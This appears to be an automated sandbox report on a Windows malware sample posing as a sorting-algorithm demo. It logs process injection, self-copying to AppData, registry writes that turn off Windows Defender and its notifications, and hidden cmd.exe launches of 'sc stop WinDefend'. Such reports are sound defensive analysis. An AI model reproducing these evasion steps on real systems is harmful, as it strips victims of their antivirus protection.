Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window (18)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Fn
Create RadixSort wndproc_parameter = 0 True 1
Fn
Create MergeSort wndproc_parameter = 0 True 1
Fn
Create QuickSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246685852 False 1
Fn
Keyboard (1)
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
System (2148)
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 17
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:36 (Local Time) True 1
Fn
Get Time type = Ticks, time = 266808 True 4
Fn
Get Time type = Ticks, time = 266824 True 10
Fn
Get Time type = Ticks, time = 266839 True 12
Fn
Get Time type = Ticks, time = 266855 True 3
Fn
Get Time type = Ticks, time = 266870 True 9
Fn
Get Time type = Ticks, time = 266886 True 1
Fn
Get Time type = Ticks, time = 266902 True 2
Fn
Get Time type = Ticks, time = 266917 True 2
Fn
Get Time type = Ticks, time = 266933 True 9
Fn
Get Time type = Ticks, time = 266948 True 6
Fn
Get Time type = Ticks, time = 266964 True 2
Fn
Get Time type = Ticks, time = 266980 True 1
Fn
Get Time type = Ticks, time = 268306 True 1
Fn
Get Time type = Ticks, time = 268321 True 5
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 15
Fn
Get Time type = Ticks, time = 268384 True 5
Fn
Get Time type = Ticks, time = 268493 True 5
Fn
Get Time type = Ticks, time = 268602 True 1
Fn
Get Time type = Ticks, time = 268696 True 4
Fn
Get Time type = Ticks, time = 268711 True 5
Fn
Get Time type = Ticks, time = 268742 True 5
Fn
Get Time type = Ticks, time = 268774 True 1
Fn
Get Time type = Ticks, time = 268836 True 4
Fn
Get Time type = Ticks, time = 268852 True 5
Fn
Get Time type = Ticks, time = 268867 True 5
Fn
Get Time type = Ticks, time = 268883 True 5
Fn
Get Time type = Ticks, time = 268898 True 5
Fn
Get Time type = Ticks, time = 268914 True 5
Fn
Get Time type = Ticks, time = 268961 True 5
Fn
Get Time type = Ticks, time = 268992 True 5
Fn
Get Time type = Ticks, time = 269008 True 5
Fn
Get Time type = Ticks, time = 269117 True 5
Fn
Get Time type = Ticks, time = 269148 True 5
Fn
Get Time type = Ticks, time = 269164 True 17
Fn
Get Time type = Ticks, time = 269179 True 3
Fn
Get Time type = Ticks, time = 269226 True 5
Fn
Get Time type = Ticks, time = 269382 True 5
Fn
Get Time type = Ticks, time = 269507 True 5
Fn
Get Time type = Ticks, time = 269522 True 1
Fn
Get Time type = Ticks, time = 269569 True 4
Fn
Get Time type = Ticks, time = 269616 True 5
Fn
Get Time type = Ticks, time = 269632 True 1
Fn
Get Time type = Ticks, time = 269663 True 4
Fn
Get Time type = Ticks, time = 269710 True 5
Fn
Get Time type = Ticks, time = 269756 True 5
Fn
Get Time type = Ticks, time = 269803 True 5
Fn
Get Time type = Ticks, time = 269850 True 5
Fn
Get Time type = Ticks, time = 269959 True 5
Fn
Get Time type = Ticks, time = 270037 True 5
Fn
Get Time type = Ticks, time = 270100 True 5
Fn
Get Time type = Ticks, time = 270146 True 5
Fn
Get Time type = Ticks, time = 270193 True 5
Fn
Get Time type = Ticks, time = 270224 True 5
Fn
Get Time type = Ticks, time = 270287 True 5
Fn
Get Time type = Ticks, time = 270334 True 5
Fn
Get Time type = Ticks, time = 270380 True 5
Fn
Get Time type = Ticks, time = 270427 True 5
Fn
Get Time type = Ticks, time = 270474 True 5
Fn
Get Time type = Ticks, time = 270521 True 5
Fn
Get Time type = Ticks, time = 270583 True 5
Fn
Get Time type = Ticks, time = 270646 True 1
Fn
Get Time type = Ticks, time = 270739 True 4
Fn
Get Time type = Ticks, time = 270786 True 5
Fn
Get Time type = Ticks, time = 270833 True 5
Fn
Get Time type = Ticks, time = 270880 True 5
Fn
Get Time type = Ticks, time = 270926 True 5
Fn
Get Time type = Ticks, time = 270973 True 5
Fn
Get Time type = Ticks, time = 271020 True 5
Fn
Get Time type = Ticks, time = 271067 True 5
Fn
Get Time type = Ticks, time = 271114 True 5
Fn
Get Time type = Ticks, time = 271160 True 5
Fn
Get Time type = Ticks, time = 271207 True 5
Fn
Get Time type = Ticks, time = 271254 True 5
Fn
Get Time type = Ticks, time = 271301 True 5
Fn
Get Time type = Ticks, time = 271348 True 5
Fn
Get Time type = Ticks, time = 271394 True 5
Fn
Get Time type = Ticks, time = 271441 True 5
Fn
Get Time type = Ticks, time = 271488 True 5
Fn
Get Time type = Ticks, time = 271535 True 5
Fn
Get Time type = Ticks, time = 271582 True 5
Fn
Get Time type = Ticks, time = 271628 True 5
Fn
Get Time type = Ticks, time = 271675 True 5
Fn
Get Time type = Ticks, time = 271722 True 5
Fn
Get Time type = Ticks, time = 271738 True 5
Fn
Get Time type = Ticks, time = 271769 True 5
Fn
Get Time type = Ticks, time = 271800 True 1
Fn
Get Time type = Ticks, time = 271831 True 4
Fn
Get Time type = Ticks, time = 271878 True 5
Fn
Get Time type = Ticks, time = 271925 True 5
Fn
Get Time type = Ticks, time = 271972 True 5
Fn
Get Time type = Ticks, time = 272018 True 5
Fn
Get Time type = Ticks, time = 272065 True 10
Fn
Get Time type = Ticks, time = 272112 True 5
Fn
Get Time type = Ticks, time = 272190 True 5
Fn
Get Time type = Ticks, time = 272237 True 50
Fn
Get Time type = Ticks, time = 272252 True 30
Fn
Get Time type = Ticks, time = 272284 True 5
Fn
Get Time type = Ticks, time = 272299 True 5
Fn
Get Time type = Ticks, time = 272330 True 15
Fn
Get Time type = Ticks, time = 272362 True 15
Fn
Get Time type = Ticks, time = 272377 True 5
Fn
Get Time type = Ticks, time = 272455 True 10
Fn
Get Time type = Ticks, time = 272471 True 5
Fn
Get Time type = Ticks, time = 272486 True 20
Fn
Get Time type = Ticks, time = 272502 True 10
Fn
Get Time type = Ticks, time = 272518 True 25
Fn
Get Time type = Ticks, time = 272533 True 20
Fn
Get Time type = Ticks, time = 272549 True 25
Fn
Get Time type = Ticks, time = 272564 True 45
Fn
Get Time type = Ticks, time = 272580 True 30
Fn
Get Time type = Ticks, time = 272596 True 30
Fn
Get Time type = Ticks, time = 272611 True 30
Fn
Get Time type = Ticks, time = 272627 True 6
Fn
Get Time type = Ticks, time = 272642 True 39
Fn
Get Time type = Ticks, time = 272658 True 35
Fn
Get Time type = Ticks, time = 272674 True 20
Fn
Get Time type = Ticks, time = 272736 True 15
Fn
Get Time type = Ticks, time = 272752 True 25
Fn
Get Time type = Ticks, time = 272767 True 10
Fn
Get Time type = Ticks, time = 272783 True 11
Fn
Get Time type = Ticks, time = 272798 True 4
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 2
Fn
Get Time type = Ticks, time = 272814 True 5
Fn
Get Time type = Ticks, time = 272830 True 1
Fn
Get Time type = Ticks, time = 272845 True 4
Fn
Get Time type = Ticks, time = 272923 True 5
Fn
Get Time type = Ticks, time = 272939 True 5
Fn
Get Time type = Ticks, time = 272954 True 5
Fn
Get Time type = Ticks, time = 272970 True 5
Fn
Get Time type = Ticks, time = 273017 True 5
Fn
Get Time type = Ticks, time = 273032 True 1
Fn
Get Time type = Ticks, time = 273048 True 4
Fn
Get Time type = Ticks, time = 273064 True 5
Fn
Get Time type = Ticks, time = 273095 True 5
Fn
Get Time type = Ticks, time = 273142 True 5
Fn
Get Time type = Ticks, time = 273173 True 5
Fn
Get Time type = Ticks, time = 273220 True 5
Fn
Get Time type = Ticks, time = 273266 True 5
Fn
Get Time type = Ticks, time = 273360 True 5
Fn
Get Time type = Ticks, time = 273376 True 5
Fn
Get Time type = Ticks, time = 273391 True 20
Fn
Get Time type = Ticks, time = 273407 True 25
Fn
Get Time type = Ticks, time = 273422 True 65
Fn
Get Time type = Ticks, time = 273438 True 15
Fn
Get Time type = Ticks, time = 273454 True 15
Fn
Get Time type = Ticks, time = 273469 True 15
Fn
Get Time type = Ticks, time = 273485 True 25
Fn
Get Time type = Ticks, time = 273500 True 15
Fn
Get Time type = Ticks, time = 273516 True 20
Fn
Get Time type = Ticks, time = 273532 True 5
Fn
Get Time type = Ticks, time = 273547 True 25
Fn
Get Time type = Ticks, time = 273563 True 10
Fn
Get Time type = Ticks, time = 273610 True 5
Fn
Get Time type = Ticks, time = 273656 True 5
Fn
Get Time type = Ticks, time = 273703 True 5
Fn
Get Time type = Ticks, time = 273734 True 5
Fn
Get Time type = Ticks, time = 273750 True 15
Fn
Get Time type = Ticks, time = 273766 True 5
Fn
Get Time type = Ticks, time = 273781 True 5
Fn
Get Time type = Ticks, time = 273812 True 1
Fn
Get Time type = Ticks, time = 273828 True 4
Fn
Get Time type = Ticks, time = 273859 True 5
Fn
Get Time type = Ticks, time = 273875 True 5
Fn
Get Time type = Ticks, time = 273906 True 5
Fn
Get Time type = Ticks, time = 273953 True 5
Fn
Get Time type = Ticks, time = 273968 True 1
Fn
Get Time type = Ticks, time = 273984 True 4
Fn
Get Time type = Ticks, time = 274000 True 5
Fn
Get Time type = Ticks, time = 274031 True 5
Fn
Get Time type = Ticks, time = 274046 True 10
Fn
Get Time type = Ticks, time = 274062 True 5
Fn
Get Time type = Ticks, time = 274078 True 5
Fn
Get Time type = Ticks, time = 274093 True 5
Fn
Get Time type = Ticks, time = 274109 True 5
Fn
Get Time type = Ticks, time = 274124 True 10
Fn
Get Time type = Ticks, time = 274140 True 5
Fn
Get Time type = Ticks, time = 274156 True 5
Fn
Get Time type = Ticks, time = 274171 True 5
Fn
Get Time type = Ticks, time = 274187 True 5
Fn
Get Time type = Ticks, time = 274202 True 5
Fn
Get Time type = Ticks, time = 274218 True 10
Fn
Get Time type = Ticks, time = 274234 True 5
Fn
Get Time type = Ticks, time = 274249 True 5
Fn
Get Time type = Ticks, time = 274265 True 20
Fn
Get Time type = Ticks, time = 274280 True 40
Fn
Get Time type = Ticks, time = 274296 True 40
Fn
Get Time type = Ticks, time = 274312 True 35
Fn
Get Time type = Ticks, time = 274327 True 40
Fn
Get Time type = Ticks, time = 274343 True 35
Fn
Get Time type = Ticks, time = 274358 True 40
Fn
Get Time type = Ticks, time = 274374 True 35
Fn
Get Time type = Ticks, time = 274390 True 40
Fn
Get Time type = Ticks, time = 274405 True 30
Fn
Get Time type = Ticks, time = 274421 True 20
Fn
Get Time type = Ticks, time = 274436 True 33
Fn
Get Time type = Ticks, time = 274452 True 37
Fn
Get Time type = Ticks, time = 274468 True 40
Fn
Get Time type = Ticks, time = 274483 True 23
Fn
Get Time type = Ticks, time = 274499 True 16
Fn
Get Time type = Ticks, time = 274514 True 16
Fn
Get Time type = Ticks, time = 274530 True 16
Fn
Get Time type = Ticks, time = 274546 True 16
Fn
Get Time type = Ticks, time = 274561 True 16
Fn
Get Time type = Ticks, time = 274577 True 16
Fn
Get Time type = Ticks, time = 274592 True 10
Fn
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
Operation Additional Information Success Count Logfile
Create - True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #14: oyvgkgw.exe
27 0
Information Value
ID #14
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x62c
Parent PID 0x64 (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x708
0x148
0x9BC
0x9B8
0x9B4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0021ffff Private Memory Readable, Writable True False False -
locale.nls 0x00220000 0x00286fff Memory Mapped File Readable False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000400000 0x00400000 0x0043cfff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory Readable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x0cc50000 0x0cc8bfff Memory Mapped File Readable False False False -
private_0x000000000cc50000 0x0cc50000 0x0cc8ffff Private Memory Readable, Writable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccc0000 0x0ccc0000 0x0ce40fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce50000 0x0ce50000 0x0e24ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e250000 0x0e250000 0x0e65ffff Pagefile Backed Memory Readable, Writable True False False -
sortdefault.nls 0x0e250000 0x0e51efff Memory Mapped File Readable False False False -
pagefile_0x000000000e520000 0x0e520000 0x0e92ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e520000 0x0e520000 0x0e58ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e590000 0x0e590000 0x0e66efff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e660000 0x0e660000 0x0ea6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e670000 0x0e670000 0x0e76ffff Private Memory Readable, Writable True False False -
private_0x000000000e770000 0x0e770000 0x0e7affff Private Memory Readable, Writable True False False -
private_0x000000000e7b0000 0x0e7b0000 0x0e8affff Private Memory Readable, Writable True False False -
private_0x000000000e8b0000 0x0e8b0000 0x0e8effff Private Memory Readable, Writable True False False -
private_0x000000000e8f0000 0x0e8f0000 0x0e9effff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ed3ffff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
comsvcs.dll 0x74c10000 0x74d45fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x400000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x43c000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x401000, size = 239104 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x7efde008, size = 4 True 1
Modify Control Flow #9: c:\programdata\oyvgkgw.exe 0x89c os_tid = 0x708, address = 0x77bf01c4 True 1
Created Files
Filename File Size Hash Values YARA Match
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e, SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c, SHA1: 2d4575457d337753a57b7941d13ac9665342641a, SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343 False
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Create C:\ProgramData\FAQ desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Directory C:\Users\kFT6uTQW\AppData\Roaming\tarutils - True 1
Copy C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe source_filename = C:\ProgramData\oyvGkGw.exe True 1
Registry (4)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - False 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications - False 1
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Process (3)
Operation Process Additional Information Success Count
Create C:\Windows\system32\cmd.exe os_pid = 0x13c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create C:\Windows\system32\cmd.exe os_pid = 0x77c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create C:\Windows\system32\cmd.exe os_pid = 0x648, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Module (6)
Operation Module Additional Information Success Count
Load shell32.dll base_address = 0x76480000 True 1
Load ntdll.dll base_address = 0x77be0000 True 1
Load shlwapi.dll base_address = 0x773c0000 True 1
Load advapi32.dll base_address = 0x77740000 True 1
Load ole32.dll base_address = 0x75be0000 True 1
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Service (3)
Operation Additional Information Success Count
Get Info service_name = WinDefend True 1
Open database_name = SERVICES_ACTIVE_DATABASE True 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (5)
Operation Additional Information Success Count
Sleep duration = 500 milliseconds (0.500 seconds) True 2
Get Info type = Hardware Information True 1
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Process #15: cmd.exe
Information Value
ID #15
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x13c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x530
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
